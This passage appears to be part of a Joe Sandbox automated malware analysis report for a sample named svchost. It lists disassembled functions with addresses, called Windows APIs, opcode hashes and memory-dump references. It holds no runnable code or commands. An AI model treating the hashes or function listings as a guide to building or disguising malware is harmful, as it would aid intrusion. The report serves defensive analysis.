                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 9355042e34944852ff9212e87fa7db3e842d82a34b20b2a516b283a9c4a288cc
                                                            • Instruction ID: 1224001d18d1efd6494b5b4d6d7a96d8f9eb95e83d6998d52532821bd1646ba9
                                                            • Opcode Fuzzy Hash: 9355042e34944852ff9212e87fa7db3e842d82a34b20b2a516b283a9c4a288cc
                                                            • Instruction Fuzzy Hash: 2AD02239154300AA4C147E7828034483355FE53BB77E013CAFC30C55C1FF14804CA013
                                                            Function 008312F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 4feb6b878dd4fd50c966a7c6799b33f9ea51ac800513f3e0f4ee84600279b4bb
                                                            • Instruction ID: 9ae70f7fb9eab8773597e49a05f3a0c673957adb4e97b2b05c9890226048fc17
                                                            • Opcode Fuzzy Hash: 4feb6b878dd4fd50c966a7c6799b33f9ea51ac800513f3e0f4ee84600279b4bb
                                                            • Instruction Fuzzy Hash: 41C0123605C200BECB022BB4DC09C2BBBA8BBA5316F08C90AB0A5C0070C239C210DB11
                                                            Function 00831A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: c17ec04132813debb14f2d4c9671c3d1bdefb2faff78daa5a6f4c77f46dc2420
                                                            • Instruction ID: 1612beb8e7e7d8ab4e24be1556463ba4cc97b927168e7dcac95d66f5a16999a5
                                                            • Opcode Fuzzy Hash: c17ec04132813debb14f2d4c9671c3d1bdefb2faff78daa5a6f4c77f46dc2420
                                                            • Instruction Fuzzy Hash: 58C1A230A002549FEF15DF68C4D8BA9BBA5FF96720F0805B9EC45DB396DB309944CBA1
                                                            Function 00833BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: d3844707e8029df880f57af8ea725121a4c4d9735b956079561ecf19be711972
                                                            • Instruction ID: f6410c46ac571b0ffd5fbd503dac24de667fba3e29b0eac14f232aacf12c8e9a
                                                            • Opcode Fuzzy Hash: d3844707e8029df880f57af8ea725121a4c4d9735b956079561ecf19be711972
                                                            • Instruction Fuzzy Hash: 9671D271100F449EDB25DB78C8559E7B7E9FF54301F40492EE2ABC7641DA326A88CF92
                                                            Function 00838284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00838289
                                                              • Part of subcall function 008313DC: __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 0083A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: a8be848f443d196cdfc8a624c64c168d48d2be2c165e85133625f3311fc2055c
                                                            • Instruction ID: 77793913f193ea14f00b161f7c48552555bdf29d2728ac2defc7a9ec56d9e98f
                                                            • Opcode Fuzzy Hash: a8be848f443d196cdfc8a624c64c168d48d2be2c165e85133625f3311fc2055c
                                                            • Instruction Fuzzy Hash: 5741C7719047589ADF20DBA4CC55AEAB378FF80704F0404EAF18AE7182EB755EC8CB91
                                                            Function 008313E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: eb44b11164a21ae76ca8bb738fb2d309d87f1cceb11c29eb1007ef4f9c493634
                                                            • Instruction ID: 4104b51cbc182c89f054b0da6ddf8635b0b669c843d33691b7d37ef2ffb477e2
                                                            • Opcode Fuzzy Hash: eb44b11164a21ae76ca8bb738fb2d309d87f1cceb11c29eb1007ef4f9c493634
                                                            • Instruction Fuzzy Hash: 424157B0905B409EE724DF398885AE6FBE5FB18300F50492ED6FEC3282CB326654CB51
                                                            Function 008313DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: c53f520769f32c29e1414d43ac9b58332e4583144aadca1eca089c9a1569b2b7
                                                            • Instruction ID: 5c28c995b5ea9b0c5f72d05b5ea1c0143030a74b66d122c9cdceeb26b190c9fe
                                                            • Opcode Fuzzy Hash: c53f520769f32c29e1414d43ac9b58332e4583144aadca1eca089c9a1569b2b7
                                                            • Instruction Fuzzy Hash: 034136B0905B409AE724DF798885AE6FBE5FF18310F50492ED6FEC3282CB326654CB51
                                                            Function 0084B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084B098
                                                              • Part of subcall function 008313DC: __EH_prolog.LIBCMT ref: 008313E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 70a35782c14d60c1164f8d309c694ef72b760e2043899b15223146921f345eba
                                                            • Instruction ID: 2467db78d9c675e51599b2cf125e1fc87ccbc32a81df2c60512cf93eb23746ac
                                                            • Opcode Fuzzy Hash: 70a35782c14d60c1164f8d309c694ef72b760e2043899b15223146921f345eba
                                                            • Instruction Fuzzy Hash: 78314A758042499ACF15DFA8C9519EEBBB4FF59304F10449AE809F7242DB75AE048BA2
                                                            Function 0085AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,00863A34), ref: 0085ACF8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 37d0cdf1af5cfda314ae06fd8f273e55efcb22307db25da3b0b3d7aadd36daa5
                                                            • Instruction ID: e42b1d75e35b9195604b3dea019a35ae68c72b50acae5ddcec154ff3e33d770d
                                                            • Opcode Fuzzy Hash: 37d0cdf1af5cfda314ae06fd8f273e55efcb22307db25da3b0b3d7aadd36daa5
                                                            • Instruction Fuzzy Hash: 0111A337A006256F9B2AAE2CEC9096A73A5FB843667164320ED15EB654D630DC0587D2
                                                            Function 0083CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 4b1c2960a01868a4ba0da6b13c695a980ffbeccf3cc78b61388b8b5fce19fb08
                                                            • Instruction ID: a4ff2571571f04fbe55cd429f0c7f987c74923060dc21114da77b1bea78ad2ad
                                                            • Opcode Fuzzy Hash: 4b1c2960a01868a4ba0da6b13c695a980ffbeccf3cc78b61388b8b5fce19fb08
                                                            • Instruction Fuzzy Hash: 7C115171A002449AEB14DB7DC545BAEBBE8FF84300F10446EE486E3282DA745A04CBA3
                                                            Function 00839215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: a42a5a457bd98e93b31bea5835a361ecd0fa1bd8fd1f7ff9d61a61fa9d31ac45
                                                            • Instruction ID: 31b63277495978e207685789fa0e5c313d5b437e36704a7b129e7d293912a5ed
                                                            • Opcode Fuzzy Hash: a42a5a457bd98e93b31bea5835a361ecd0fa1bd8fd1f7ff9d61a61fa9d31ac45
                                                            • Instruction Fuzzy Hash: 68015E73900928ABCF22ABACCC819DEB776FFC8750F014525E866F7252DA748D05C6E1
                                                            Function 0084DA52 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084DA57
                                                              • Part of subcall function 00840659: _wcslen.LIBCMT ref: 0084066F
                                                              • Part of subcall function 00837B0D: __EH_prolog.LIBCMT ref: 00837B12
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 9f73c9c828a578761c8216b42c398e92fd7408e064a45c91b1476ec125d6e83e
                                                            • Instruction ID: 3551871c9a3ed489ae02b07dc18aa9b38633f55ce626d607df462478b69d44d2
                                                            • Opcode Fuzzy Hash: 9f73c9c828a578761c8216b42c398e92fd7408e064a45c91b1476ec125d6e83e
                                                            • Instruction Fuzzy Hash: 5B11EB71508294EED711EB9CA8067DD7BA0FB25710F0140AEE245E3392DBB59A44CB62
                                                            Function 0085C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0085B136: RtlAllocateHeap.NTDLL(00000008,00863A34,00000000,?,0085989A,00000001,00000364,?,?,?,0083D984,?,?,?,00000004,0083D710), ref: 0085B177
                                                            • _free.LIBCMT ref: 0085C4E5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 68d39c4cff342ce39e597a1a715b80465afe24566a29d6cd36b19b786e58697b
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 7D01D6722003056FE3318E699885D6AFBE9FB85371F25061DE994D3281EA30A949CB79
                                                            Function 00837B0D Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00837B12
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 00842089: __EH_prolog.LIBCMT ref: 0084208E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b0d278f54ecd122cdcfdb4e0479838569978540f4c0b31535e0e1dc9165c4347
                                                            • Instruction ID: 9d4a7c2519f0b176cdfb32cdc01202c4a16e1c745fd89c80c8062131ce0c5151
                                                            • Opcode Fuzzy Hash: b0d278f54ecd122cdcfdb4e0479838569978540f4c0b31535e0e1dc9165c4347
                                                            • Instruction Fuzzy Hash: 3C0180716107499BDB24DFB8C4417AEF6F4FF48366F10892EE05AE3280D7B49904C7A1
                                                            Function 0085B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00863A34,00000000,?,0085989A,00000001,00000364,?,?,?,0083D984,?,?,?,00000004,0083D710), ref: 0085B177
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: e8aadc3c8c83e940c738cc529458cc8926bc1e15d33530c0e8e84ee7bc9425a6
                                                            • Instruction ID: ec0db840ebae35b6e695a4f68f34a635a69dbee267be3fec7e78b6d35dcd8cbd
                                                            • Opcode Fuzzy Hash: e8aadc3c8c83e940c738cc529458cc8926bc1e15d33530c0e8e84ee7bc9425a6
                                                            • Instruction Fuzzy Hash: 96F0B432585928B7DBA25A65AC26B5E3748FB61773B188122FC08E7190CB20DD0986E1
                                                            Function 00853C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00853C3F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 02a0fe49b2edadf4160227866b4f510985ffbb00c618098a66dbe79b08b2f0c1
                                                            • Instruction ID: 01364d83c77d33bc333a7c88a756190247b194064fd35ada5e4b6d0a3b1c17e0
                                                            • Opcode Fuzzy Hash: 02a0fe49b2edadf4160227866b4f510985ffbb00c618098a66dbe79b08b2f0c1
                                                            • Instruction Fuzzy Hash: 80F0E5362042169FCF119EA8FC0099A77A9FF11BA37144125FE05E71D0EB31DE28C7A0
                                                            Function 00858E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ff3b02db1b9f20a172a547d28a10515df157fe3423dd2a06b9bd54ab612c4061
                                                            • Instruction ID: 2aa370d41b1c6e5978949adbb55b58f5e2fa2fab82188bd4e63c6b700d425aba
                                                            • Opcode Fuzzy Hash: ff3b02db1b9f20a172a547d28a10515df157fe3423dd2a06b9bd54ab612c4061
